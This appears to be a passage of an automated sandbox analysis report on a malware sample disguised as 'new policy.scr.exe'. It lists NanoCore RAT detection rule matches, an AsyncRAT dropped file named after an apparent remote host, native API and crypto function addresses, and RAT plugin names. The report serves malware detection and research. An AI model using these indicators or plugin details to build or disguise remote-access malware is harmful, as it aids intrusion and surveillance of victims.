Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000009.00000002.2363417540.0000000003E7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000008.00000002.2274766919.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000002.2870782033.0000000007980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: new policy.scr.exe PID: 7784, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR	Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Contains functionality to call native functions

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5FBD0 NtResumeThread,	0_2_05D5FBD0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E6E0 NtProtectVirtualMemory,	0_2_05D5E6E0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5FBC8 NtResumeThread,	0_2_05D5FBC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E6DB NtProtectVirtualMemory,	0_2_05D5E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9FBD0 NtResumeThread,	6_2_05D9FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E6E0 NtProtectVirtualMemory,	6_2_05D9E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9FBC8 NtResumeThread,	6_2_05D9FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E6DB NtProtectVirtualMemory,	6_2_05D9E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594FBD0 NtResumeThread,	7_2_0594FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E6E0 NtProtectVirtualMemory,	7_2_0594E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594FBC8 NtResumeThread,	7_2_0594FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E6D9 NtProtectVirtualMemory,	7_2_0594E6D9

Detected potential crypto function

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D6BC8	0_2_013D6BC8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013DB178	0_2_013DB178
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D6BB8	0_2_013D6BB8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_013D7638	0_2_013D7638
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_053505F8	0_2_053505F8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_053505E8	0_2_053505E8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E7C48	0_2_059E7C48
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E0040	0_2_059E0040
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6E88	0_2_059E6E88
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E0006	0_2_059E0006
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E7C38	0_2_059E7C38
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E8048	0_2_059E8048
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6710	0_2_059E6710
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E6720	0_2_059E6720
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E1290	0_2_059E1290
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E12A0	0_2_059E12A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059E8200	0_2_059E8200
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF2CF1	0_2_05BF2CF1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF3087	0_2_05BF3087
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BF4368	0_2_05BF4368
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5B928	0_2_05D5B928
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D598B0	0_2_05D598B0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E458	0_2_05D5E458
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D52EB8	0_2_05D52EB8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5B918	0_2_05D5B918
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D598A0	0_2_05D598A0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5E44B	0_2_05D5E44B
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D59C03	0_2_05D59C03
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5AE10	0_2_05D5AE10
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D5AE00	0_2_05D5AE00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7EFA0	0_2_05E7EFA0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7FB00	0_2_05E7FB00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E7D088	0_2_05E7D088
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E60040	0_2_05E60040
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E60006	0_2_05E60006
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Code function: 2_2_00007FFD9BAC6D69	2_2_00007FFD9BAC6D69
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Code function: 2_2_00007FFD9BAC5FB9	2_2_00007FFD9BAC5FB9
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588E5D8	3_2_0588E5D8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_05883471	3_2_05883471
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588DE00	3_2_0588DE00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588F1F0	3_2_0588F1F0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588B098	3_2_0588B098
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588B0A8	3_2_0588B0A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588FAD0	3_2_0588FAD0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077554B8	3_2_077554B8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775E3F8	3_2_0775E3F8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775DB28	3_2_0775DB28
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07755A00	3_2_07755A00
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07759850	3_2_07759850
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775D7E0	3_2_0775D7E0
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775A526	3_2_0775A526
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775A468	3_2_0775A468
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077554A8	3_2_077554A8
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_077559F1	3_2_077559F1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0775E8F8	3_2_0775E8F8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B26BC8	6_2_02B26BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B2B178	6_2_02B2B178
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B26BBF	6_2_02B26BBF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B2765B	6_2_02B2765B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B59EF0	6_2_02B59EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5E707	6_2_02B5E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B56A10	6_2_02B56A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5E9E5	6_2_02B5E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B59EE1	6_2_02B59EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5ECB0	6_2_02B5ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B5ECAE	6_2_02B5ECAE
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A20040	6_2_05A20040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A27C48	6_2_05A27C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26E88	6_2_05A26E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A2003B	6_2_05A2003B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A27C38	6_2_05A27C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26720	6_2_05A26720
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A26710	6_2_05A26710
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A212A0	6_2_05A212A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A21290	6_2_05A21290
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A28200	6_2_05A28200
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C32D50	6_2_05C32D50
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C33087	6_2_05C33087
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C34368	6_2_05C34368
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9B928	6_2_05D9B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D998B0	6_2_05D998B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E458	6_2_05D9E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D92EB8	6_2_05D92EB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9B918	6_2_05D9B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D998A0	6_2_05D998A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9E44B	6_2_05D9E44B
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D99C03	6_2_05D99C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9AE10	6_2_05D9AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D9AE00	6_2_05D9AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBEFA0	6_2_05EBEFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBFB00	6_2_05EBFB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EBD088	6_2_05EBD088
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EA0040	6_2_05EA0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05EA0021	6_2_05EA0021
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF6BC8	7_2_00DF6BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DFB178	7_2_00DFB178
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF6BB8	7_2_00DF6BB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00DF735D	7_2_00DF735D
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F19EF0	7_2_00F19EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1E707	7_2_00F1E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1E9E5	7_2_00F1E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F16A10	7_2_00F16A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1ECB0	7_2_00F1ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F1ECAF	7_2_00F1ECAF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F19EE1	7_2_00F19EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D7C48	7_2_055D7C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D0040	7_2_055D0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6E88	7_2_055D6E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D0006	7_2_055D0006
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D7C38	7_2_055D7C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6710	7_2_055D6710
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6720	7_2_055D6720
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D8200	7_2_055D8200
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D1290	7_2_055D1290
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D12A0	7_2_055D12A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E4368	7_2_057E4368
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E2CF1	7_2_057E2CF1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E0F1A	7_2_057E0F1A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057EB5AF	7_2_057EB5AF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E3087	7_2_057E3087
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594B928	7_2_0594B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059498B0	7_2_059498B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E458	7_2_0594E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594B918	7_2_0594B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059498A0	7_2_059498A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05949C03	7_2_05949C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594304A	7_2_0594304A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E44A	7_2_0594E44A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594AE10	7_2_0594AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594AE00	7_2_0594AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6EFA0	7_2_05A6EFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6FB00	7_2_05A6FB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6D088	7_2_05A6D088
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A50007	7_2_05A50007
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A50040	7_2_05A50040

One or more processes crash

Source: C:\Users\user\Desktop\new policy.scr.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336

Sample file is different than original file name gathered from version info

Source: new policy.scr.exe, 00000000.00000002.1883536648.0000000005510000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1862029930.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000000.1641044218.0000000000992000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
